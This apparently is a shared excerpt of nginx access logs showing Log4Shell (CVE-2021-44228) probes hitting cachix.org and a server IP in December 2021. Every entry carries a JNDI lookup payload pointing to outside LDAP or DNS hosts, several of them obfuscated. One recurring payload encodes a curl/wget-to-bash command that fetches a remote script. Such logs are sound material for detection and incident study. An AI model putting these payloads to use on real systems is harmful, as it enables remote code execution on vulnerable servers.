@domenkozar
Created December 14, 2021 10:19
"12/Dec/2021:00:48:04 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" request_length=184 client=143.198.183.66 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Kryptos Logic Telltale" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:19:12:58 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" request_length=156 client=195.201.175.217 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Mozilla/5.0 zgrab/0.x" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:33:06 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://6c6889d27e144104a5a1.y.psc4fuel.com/7tD39.class%7D HTTP/1.1" request_length=678 client=172.69.62.102 bytes_sent=696 body_bytes_sent=548 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:34:16 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://b23f7e5fe8114984a7c1.y.psc4fuel.com/DV1IT.class%7D HTTP/1.1" request_length=680 client=172.69.63.78 bytes_sent=696 body_bytes_sent=548 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:35:00 +0000" status=404 host=cachix.org request="GET /$%7Bjndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class%7D HTTP/1.1" request_length=914 client=173.245.54.236 bytes_sent=696 body_bytes_sent=548 referer=https://google.com/${jndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://76932c8cc3bb420285a8.y.psc4fuel.com/kSq9A.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:37:49 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://73d500abca5d44a3a1ba.y.psc4fuel.com/Ddm8u.class%7D HTTP/1.1" request_length=684 client=172.69.62.140 bytes_sent=1063 body_bytes_sent=833 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:22:53:32 +0000" status=404 host=cachix.org request="POST /$%7Bjndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class%7D HTTP/1.1" request_length=936 client=162.158.94.221 bytes_sent=696 body_bytes_sent=548 referer=https://google.com/${jndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://c6eb6046e7f94aa6a322.y.psc4fuel.com/ywbfk.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:07:29 +0000" status=301 host=app.cachix.org request="GET /$%7Bjndi:ldap://df722dd05277408b9a50.y.psc4fuel.com/APNlX.class%7D HTTP/1.1" request_length=682 client=172.69.62.18 bytes_sent=419 body_bytes_sent=162 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:07:29 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://df722dd05277408b9a50.y.psc4fuel.com/APNlX.class%7D HTTP/1.1" request_length=684 client=172.69.62.18 bytes_sent=1063 body_bytes_sent=833 referer=- user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:21:25 +0000" status=405 host=app.cachix.org request="POST /$%7Bjndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class%7D HTTP/1.1" request_length=940 client=162.158.88.161 bytes_sent=702 body_bytes_sent=552 referer=https://google.com/${jndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://73b74ab52f6f4257acea.y.psc4fuel.com/CLYXK.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:50:49 +0000" status=200 host=app.cachix.org request="GET /$%7Bjndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class%7D HTTP/1.1" request_length=920 client=172.69.62.120 bytes_sent=1063 body_bytes_sent=833 referer=https://google.com/${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"12/Dec/2021:23:50:49 +0000" status=301 host=app.cachix.org request="GET /$%7Bjndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class%7D HTTP/1.1" request_length=918 client=172.69.62.120 bytes_sent=419 body_bytes_sent=162 referer=https://google.com/${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class} user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko, ${jndi:ldap://10d708991583466d8f66.y.psc4fuel.com/uypox.class}) Chrome/93.0.4577.63 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:06:51 +0000" status=404 host=34.205.214.246 request="GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" request_length=156 client=112.74.52.90 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="Mozilla/5.0 zgrab/0.x" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:13:22 +0000" status=200 host=34.205.214.246 request="GET / HTTP/1.1" request_length=214 client=157.245.102.218 bytes_sent=817 body_bytes_sent=612 referer=- user_agent="${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:00:13:23 +0000" status=404 host=34.205.214.246 request="GET /favicon.ico HTTP/1.1" request_length=225 client=157.245.102.218 bytes_sent=294 body_bytes_sent=146 referer=- user_agent="${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:04:54:58 +0000" status=200 host=34.205.214.246 request="GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} HTTP/1.1" request_length=788 client=195.54.160.149 bytes_sent=812 body_bytes_sent=612 referer=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} user_agent="${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"13/Dec/2021:15:05:30 +0000" status=200 host=localhost request="GET / HTTP/1.0" request_length=460 client=167.172.44.255 bytes_sent=812 body_bytes_sent=612 referer=- user_agent="borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:04:20:53 +0000" status=200 host=34.205.214.246 request="GET / HTTP/1.1" request_length=169 client=192.46.237.61 bytes_sent=817 body_bytes_sent=612 referer=${jndi:dns://34-205-214-246.scanworld.net/ref} user_agent="${jndi:dns://34-205-214-246.scanworld.net/ua}" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:10:13:06 +0000" status=200 host=34.205.214.246 request="GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} HTTP/1.1" request_length=622 client=92.172.255.25 bytes_sent=817 body_bytes_sent=612 referer=- user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-
"14/Dec/2021:10:13:06 +0000" status=404 host=34.205.214.246 request="GET /favicon.ico HTTP/1.1" request_length=565 client=92.172.255.25 bytes_sent=696 body_bytes_sent=548 referer=http://34.205.214.246/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMDUuMjE0LjI0Njo4MCl8YmFzaA==} user_agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" upstream_addr=- upstream_status=- request_time=0.000 upstream_response_time=- upstream_connect_time=- upstream_header_time=-